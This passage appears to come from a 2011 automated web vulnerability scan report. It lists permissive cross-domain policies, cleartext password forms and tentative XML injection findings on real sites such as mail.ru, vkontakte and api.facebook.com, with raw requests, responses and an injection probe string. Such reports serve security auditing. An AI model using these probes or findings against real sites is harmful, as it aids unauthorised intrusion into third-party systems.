Confidence:	Certain
Host:	http://mail.radar.imgsmail.ru
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: mail.radar.imgsmail.ru

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 14:25:12 GMT
Server: Apache/1.3.27 (Unix) mru_xml/0.471 gorgona/2.1 mod_jk/1.2.4 mod_ruby/1.0.7 Ruby/1.6.8 mod_mrim/0.17
Connection: close
Content-Length: 172
Content-Type: text/xml

<?xml version="1.0"?><cross-domain-policy><allow-access-from domain="*.mail.ru" to-ports="*"/><allow-access-from domain="*.imgsmail.ru" to-ports="*"/></cross-domain-policy>

6.45. http://mail.ru/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://mail.ru
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: mail.ru

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 14:24:41 GMT
Server: Apache/1.3.27 (Unix) mru_xml/0.471 gorgona/2.1 mod_jk/1.2.4 mod_ruby/1.0.7 Ruby/1.6.8 mod_mrim/0.17
Connection: close
Set-Cookie: mrcu=1AB44DB58429635EFBCAF3D6C1AD; expires=Thu, 22 Apr 2021 14:24:41 GMT; path=/; domain=.mail.ru
Content-Length: 343
Content-Type: text/xml

<?xml version="1.0"?><cross-domain-policy><allow-access-from domain="*.files.mail.ru" to-ports="80"/><allow-access-from domain="img.imgsmail.ru" to-ports="80"/><allow-access-from domain="win.mail.ru" to-ports="80"/><allow-access-from domain="e.mail.ru" to-ports="80"/>
...[SNIP]...

6.46. http://odnoklassniki.ru/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://odnoklassniki.ru
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: odnoklassniki.ru

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"1148-1303437212000"
Last-Modified: Fri, 22 Apr 2011 01:53:32 GMT
Content-Type: application/xml;charset=UTF-8
Content-Length: 1148
Date: Mon, 25 Apr 2011 14:26:37 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"/>
<allow-http-request-headers-from domain="odnoklassniki.ru" headers="*"/>
<allow-http-
...[SNIP]...
<allow-access-from domain="*.odnoklassniki.ru"/>
<allow-access-from domain="odnoklassniki.ua"/>
<allow-access-from domain="*.odnoklassniki.ua"/>
<allow-access-from domain="odnoklasniki.ru"/>
<allow-access-from domain="*.odnoklasniki.ru"/>
<allow-access-from domain="odnoklasniki.ua"/>
<allow-access-from domain="*.odnoklasniki.ua"/>
...[SNIP]...

6.47. http://oth.dt00.net/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://oth.dt00.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: oth.dt00.net

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:32:23 GMT
Content-Type: text/xml
Content-Length: 526
Last-Modified: Thu, 22 Apr 2010 11:07:27 GMT
Connection: close
Expires: Wed, 25 May 2011 14:32:23 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="intv.ru" to-ports="80"/>
<allow-http-request-headers-from domain="intv.ru" headers="*" />
<allow-access-from domain="*.intv.ru" to-ports="80"/>
...[SNIP]...
<allow-access-from domain="www.liveresult.ru" to-ports="80"/>
...[SNIP]...

6.48. http://www.gartner.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.gartner.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.gartner.com

Response

HTTP/1.1 200 OK
Connection: close
Content-type: text/xml
Last-modified: Mon, 28 Jan 2008 18:59:12 GMT
Date: Mon, 25 Apr 2011 12:10:49 GMT
Content-Length: 214
ETag: "pve91a8585e0a42393cfbb818f11d57002"
X-PvInfo: [S10232.C10821.A151092.RA0.G24F27.UDDE6142E].[OT/xml.OG/pages]
Vary: Accept-Encoding
Accept-Ranges: bytes
Set-Cookie: TS83f541=1da366c651cf93bce481d43030625b76ac71a41bc37e25a84db564c8; Path=/

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.gartner.com" />
</cross-
...[SNIP]...

6.49. http://www.livejournal.com/crossdomain.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.livejournal.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.livejournal.com

Response

HTTP/1.1 200 OK
Server: GoatProxy 1.0
Date: Mon, 25 Apr 2011 14:27:55 GMT
Content-Type: text/xml
Connection: close
X-AWS-Id: ws07
Set-Cookie: ljuniq=BlrhjlxYzDyERwT:1303741675:pgstats0:m0; expires=Friday, 24-Jun-2011 14:27:55 GMT; domain=.livejournal.com; path=/
Last-Modified: Thu, 17 Mar 2011 16:39:44 GMT
ETag: "bb0fbb-26b-49eb04f04f400"
Accept-Ranges: bytes
Content-Length: 619
X-Varnish: 1789549813
Age: 0
Via: 1.1 varnish

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-coss-domain-polic
...[SNIP]...
<allow-access-from domain="wh.lj.ru"/>
<allow-access-from domain="ljaqua.wh.lj.ru"/>
<allow-access-from domain="swfplayer.services.livejournal.com"/>
<allow-access-from domain="player.livejournal.ru"/>
<allow-access-from domain="player.championat.net"/>
<allow-access-from domain="player.gazeta.ru"/>
<allow-access-from domain="player.quto.ru"/>
...[SNIP]...

7. Silverlight cross-domain policy previous next
There are 5 instances of this issue:

http://ad.doubleclick.net/clientaccesspolicy.xml
http://b.voicefive.com/clientaccesspolicy.xml
http://beacon.securestudies.com/clientaccesspolicy.xml
http://pl.yumenetworks.com/clientaccesspolicy.xml
http://s0.2mdn.net/clientaccesspolicy.xml

7.1. http://ad.doubleclick.net/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 314
Last-Modified: Wed, 21 May 2008 19:54:04 GMT
Date: Mon, 25 Apr 2011 14:31:42 GMT

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

7.2. http://b.voicefive.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.voicefive.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: b.voicefive.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 15 Oct 2009 22:41:14 GMT
Content-Type: application/xml
Expires: Tue, 26 Apr 2011 14:23:30 GMT
Date: Mon, 25 Apr 2011 14:23:30 GMT
Content-Length: 320
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resou
...[SNIP]...

7.3. http://beacon.securestudies.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://beacon.securestudies.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: beacon.securestudies.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 15 Oct 2009 22:41:14 GMT
Content-Type: application/xml
Expires: Tue, 26 Apr 2011 14:50:23 GMT
Date: Mon, 25 Apr 2011 14:50:23 GMT
Content-Length: 320
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resou
...[SNIP]...

7.4. http://pl.yumenetworks.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pl.yumenetworks.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: pl.yumenetworks.com

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:53:49 GMT
Server: Apache/2.2.13 (Unix) mod_ssl/2.2.13 OpenSSL/0.9.7a DAV/2
Last-Modified: Fri, 18 Mar 2011 06:46:34 GMT
ETag: "21a082c-135-49ebc23880680"
Accept-Ranges: bytes
Content-Length: 309
P3P: policyref="http://ads.yumenetworks.com/P3P/PolicyReferences.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Connection: close
Content-Type: application/xml

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="SOAPAction">
<domain uri="*"/>
</allow-from>
<grant-to>
<resourc
...[SNIP]...

7.5. http://s0.2mdn.net/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://s0.2mdn.net
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: s0.2mdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Mon, 25 Apr 2011 13:07:06 GMT
Expires: Tue, 26 Apr 2011 13:07:06 GMT
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=86400
Age: 6181

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

8. Cleartext submission of password previous next
There are 10 instances of this issue:

http://direct.yandex.ru/
http://direct.yandex.ru/pages/direct/_direct-1303387947.js
http://mail.ru/
http://my.webalta.ru/public/engine/templates.js
http://my.webalta.ru/public/engine/templates.js
http://odnoklassniki.ru/
http://pda.loveplanet.ru/
http://pretty.ru/
http://vkontakte.ru/
http://www.marketgid.com/pnews/773204/i/7269/pp/2/1/

8.1. http://direct.yandex.ru/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://direct.yandex.ru
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://passport.yandex.ru/passport?mode=auth&from=direct&retpath=http%3A%2F%2Fdirect.yandex.ru%2Fregistered%2Fmain.pl

The form contains the following password field:

passwd

Request

GET /?partner HTTP/1.1
Host: direct.yandex.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yandexuid=1981869761303741204

Response

8.2. http://direct.yandex.ru/pages/direct/_direct-1303387947.js previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://direct.yandex.ru
Path:	/pages/direct/_direct-1303387947.js

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://direct.yandex.ru/pages/direct/_direct-1303387947.js

The form contains the following password field:

passwd

Request

GET /pages/direct/_direct-1303387947.js HTTP/1.1
Host: direct.yandex.ru
Proxy-Connection: keep-alive
Referer: http://direct.yandex.ru/?partner
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yandexuid=1981869761303741204

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:36:36 GMT
Content-Type: application/x-javascript; charset=utf-8
Last-Modified: Thu, 21 Apr 2011 12:12:27 GMT
Connection: keep-alive
Expires: Tue, 26 Apr 2011 14:36:36 GMT
Cache-Control: max-age=86400
Content-Length: 432639

var ADDRESS_STREET_PREFIXES="",ALLOW_LETTERS="abcdefghijklmonpqrstuvwxyzABCDEFGHIJKLMONPQRSTUVWXYZ......................................................................................................
...[SNIP]...
ion_popup-50-50")&&window.scrollTo(0,0);d.show().find("input[name=login]").focus();b(document).trigger("show.b-domik_type_popup")}function e(){b(document).unbind(".b-domik");d.hide()}function h(){d=b('<form class="'+g.attr("class").replace("g-hidden","")+'"><i class="b-domik__roof">
...[SNIP]...
<div class="b-input"><input class="b-input__text" id="b-domik_popup-password" name="passwd" value="'+g.find("input[name=passwd]").val()+'" type="password" tabindex="11"/></div>
...[SNIP]...

8.3. http://mail.ru/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mail.ru
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://e.mail.ru/cgi-bin/auth

The form contains the following password field:

Password

Request

GET / HTTP/1.1
Host: mail.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:24:37 GMT
Server: Apache/1.3.27 (Unix) mru_xml/0.471 gorgona/2.1 mod_jk/1.2.4 mod_ruby/1.0.7 Ruby/1.6.8 mod_mrim/0.17
Connection: close
Set-Cookie: Mpopl=721425857; expires=Mon, 25 Apr 2011 14:39:37 GMT; path=/; domain=.mail.ru
Set-Cookie: mrcu=D5824DB584250497422EF3D6C1AD; expires=Thu, 22 Apr 2021 14:24:37 GMT; path=/; domain=.mail.ru
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Expires: Sun, 25 Apr 2010 14:24:37 GMT
Last-Modified: Mon, 25 Apr 2011 18:24:37 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=windows-1251
Content-Length: 114440

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ru" lang="ru">
<head
...[SNIP]...
<div class="relative z100 m">
<form name="Auth" method="post" action="http://e.mail.ru/cgi-bin/auth" style="overflow: hidden;">

<img src="http://limg.imgsmail.ru/mail/ru/images/log_bms.gif" width="226" height="18" usemap="#logbms" alt="" />
...[SNIP]...
<td><input type="password" class="long" size="15" name="Password" tabindex="5"
value="" /></td>
...[SNIP]...

8.4. http://my.webalta.ru/public/engine/templates.js previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://my.webalta.ru
Path:	/public/engine/templates.js

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://my.webalta.ru/public/engine/templates.js

The form contains the following password field:

pass

Request

GET /public/engine/templates.js HTTP/1.1
Host: my.webalta.ru
Proxy-Connection: keep-alive
Referer: http://my.webalta.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165308000.1303741218.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); pogoda_reg=10290; __utma=165308000.73118877.1303741218.1303741218.1303741218.1; __utmc=165308000; __utmb=165308000.3.10.1303741218

Response

HTTP/1.1 200 OK
Server: nginx/0.7.61
Date: Mon, 25 Apr 2011 14:27:32 GMT
Content-Type: application/x-javascript
Content-Length: 17139
Last-Modified: Tue, 27 Apr 2010 14:52:13 GMT
Connection: keep-alive
Keep-Alive: timeout=20
Expires: Mon, 16 May 2011 14:27:32 GMT
Cache-Control: max-age=1814400
Accept-Ranges: bytes

//
//
   // .................. ............
   function tmpl_favicon(url)
   {
       url = url.replace('http://', '') + '/';
       url = url.substr(0, url.indexOf('/'));
       var sub1 = url.substr(0, 2);
       var
...[SNIP]...
<td><form action="#" onsubmit="f_input(this); return false;" >';
       str+='E-mail:<br>
...[SNIP]...
<br><input name="pass" type="password" value="" size=20 onClick=\'this.focus();\'>';
       str+= '<br>
...[SNIP]...

8.5. http://my.webalta.ru/public/engine/templates.js previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://my.webalta.ru
Path:	/public/engine/templates.js

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://my.webalta.ru/public/engine/templates.js

The form contains the following password fields:

pass
pass2

Request

Response

HTTP/1.1 200 OK
Server: nginx/0.7.61
Date: Mon, 25 Apr 2011 14:27:32 GMT
Content-Type: application/x-javascript
Content-Length: 17139
Last-Modified: Tue, 27 Apr 2010 14:52:13 GMT
Connection: keep-alive
Keep-Alive: timeout=20
Expires: Mon, 16 May 2011 14:27:32 GMT
Cache-Control: max-age=1814400
Accept-Ranges: bytes

//
//
   // .................. ............
   function tmpl_favicon(url)
   {
       url = url.replace('http://', '') + '/';
       url = url.substr(0, url.indexOf('/'));
       var sub1 = url.substr(0, 2);
       var
...[SNIP]...
<td style=\'width:50%;\'><form onsubmit="f_reg(this); return false;" >';
       str+='...................... ................... ...... ......................, ...... ........ ................ .......... .................. .. ................ .......................';
       s
...[SNIP]...
<br><input size=20 name="pass" type="password" value="" onClick=\'this.focus();\'>';
       str+='<br>
...[SNIP]...
<br><input size=20 name="pass2" type="password" value="" onClick=\'this.focus();\'>';
       str+= '<br>
...[SNIP]...

8.6. http://odnoklassniki.ru/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://odnoklassniki.ru
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.odnoklassniki.ru/dk?cmd=AnonymLogin&st.cmd=anonymLogin&tkn=6956

The form contains the following password field:

st.password

Request

GET / HTTP/1.1
Host: odnoklassniki.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: CHECK_COOKIE=true; Domain=.odnoklassniki.ru; Expires=Mon, 25-Apr-2011 14:27:36 GMT; Path=/
Cache-Control: no-cache
Cache-Control: no-store
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Rendered-Blocks: HtmlPage
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 25 Apr 2011 14:26:36 GMT
Content-Length: 13753

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head><title>..........................</title>
<meta http-equiv="Content-Type" con
...[SNIP]...
<div class="panelBox_body"><form action="http://www.odnoklassniki.ru/dk?cmd=AnonymLogin&st.cmd=anonymLogin&tkn=6956" method="post"><input value="" type="hidden" name="st.redirect">
...[SNIP]...
</label><input id="field_password" maxlength="" name="st.password" value="" class="fi" type="password" size="20"><div class="checkbox">
...[SNIP]...

8.7. http://pda.loveplanet.ru/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pda.loveplanet.ru
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://pda.loveplanet.ru/a-logon/

The form contains the following password field:

password

Request

GET / HTTP/1.1
Host: pda.loveplanet.ru
Proxy-Connection: keep-alive
Referer: http://my.webalta.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:51:44 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Set-Cookie: domhit=1; path=/; expires=Mon, 02-May-2011 14:51:44 GMT; domain=.pda.loveplanet.ru
Set-Cookie: affiliate_reff=http%3A%2F%2Fmy.webalta.ru%2F; path=/; expires=Tue, 24-Apr-2012 14:51:44 GMT; domain=.pda.loveplanet.ru
Set-Cookie: randomhit=1698142961; path=/; expires=Tue, 24-Apr-2012 14:51:44 GMT; domain=.pda.loveplanet.ru
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 25 Apr 2011 14:51:44 GMT
Content-Length: 11125

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<title>.................... LovePlanet.ru. .......... .............. .. .........
...[SNIP]...
<div class="bl_login bg_lightgray">
<form method="post" action="/a-logon/" name="login">
<input type="hidden" name="a" value="logon">
...[SNIP]...
<nobr>............ <input type="password" class="itxt" size="5" name="password" id="password"></nobr>
...[SNIP]...

8.8. http://pretty.ru/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pretty.ru
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://pretty.ru/a-logon/

The form contains the following password field:

password

Request

GET / HTTP/1.1
Host: pretty.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

8.9. http://vkontakte.ru/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://vkontakte.ru
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://login.vk.com/?act=login

The form contains the following password field:

pass

Request

GET / HTTP/1.1
Host: vkontakte.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Mon, 25 Apr 2011 14:23:04 GMT
Content-Type: text/html; charset=windows-1251
Connection: keep-alive
X-Powered-By: PHP/5.2.6-1+lenny9
Set-Cookie: remixchk=5; expires=Tue, 17-Apr-2012 02:49:46 GMT; path=/; domain=.vkontakte.ru
Pragma: no-cache
Cache-control: no-store
Vary: Accept-Encoding
Content-Length: 12904

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<script type="
...[SNIP]...
<div id="quick_login">
<form method="POST" name="login" id="quick_login_form" action="http://login.vk.com/?act=login" onsubmit="if (vklogin) {return true} else {quick_login();return false;}">
<input type="hidden" name="act" value="login" />
...[SNIP]...
<div class="labeled"><input type="password" name="pass" class="text" onfocus="show('quick_expire')" id="quick_pass" /></div>
...[SNIP]...

8.10. http://www.marketgid.com/pnews/773204/i/7269/pp/2/1/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.marketgid.com
Path:	/pnews/773204/i/7269/pp/2/1/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://usr.marketgid.com/creative/auth/

The form contains the following password field:

pass

Request

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:31:32 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Keep-Alive: timeout=20
Cache-Control: no-cache, must-revalidate
Content-Length: 48728

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<div class="menu_body" style="margin-bottom:5px">
<form id="mg-auth-form-1" action="http://usr.marketgid.com/creative/auth/" method="post">
<div>
...[SNIP]...
</div>
<input id="pass" type="password" name="pass" value=".........." size="25" tabindex="2" onfocus="form_change(this)" onblur="form_change(this)" /><input class="submit-button" type="submit" value="........" tabindex="3" />
...[SNIP]...

9. XML injection previous next
There are 4 instances of this issue:

http://api.facebook.com/restserver.php [format parameter]
http://l-files.livejournal.net/userapps/4/image [REST URL parameter 1]
http://l-files.livejournal.net/userapps/4/image [REST URL parameter 2]
http://l-files.livejournal.net/userapps/4/image [REST URL parameter 3]

9.1. http://api.facebook.com/restserver.php [format parameter] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://api.facebook.com
Path:	/restserver.php

Issue detail

The format parameter appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the format parameter. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /restserver.php?v=1.0&method=links.getStats&urls=%5B%22http%3A%2F%2Fwww.eset.com%2Fus%2Fhome%2Fsmart-security%22%5D&format=json]]>>&callback=fb_sharepro_render HTTP/1.1
Host: api.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/home/smart-security
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=120
Content-Type: text/javascript;charset=utf-8
Expires: Mon, 25 Apr 2011 08:22:36 -0700
Pragma:
X-FB-Rev: 370179
X-FB-Server: 10.32.44.124
X-Cnection: close
Date: Mon, 25 Apr 2011 15:20:36 GMT
Content-Length: 773

fb_sharepro_render('<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<links_getStats_response xmlns=\"http://api.facebook.com/1.0/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xsi:schemaLocation=\"http://api.facebook.com/1.0/ http://api.facebook.com/1.0/facebook.xsd\" list=\"true\">
...[SNIP]...

9.2. http://l-files.livejournal.net/userapps/4/image [REST URL parameter 1] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://l-files.livejournal.net
Path:	/userapps/4/image

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /userapps]]>>/4/image?v=1297757136 HTTP/1.1
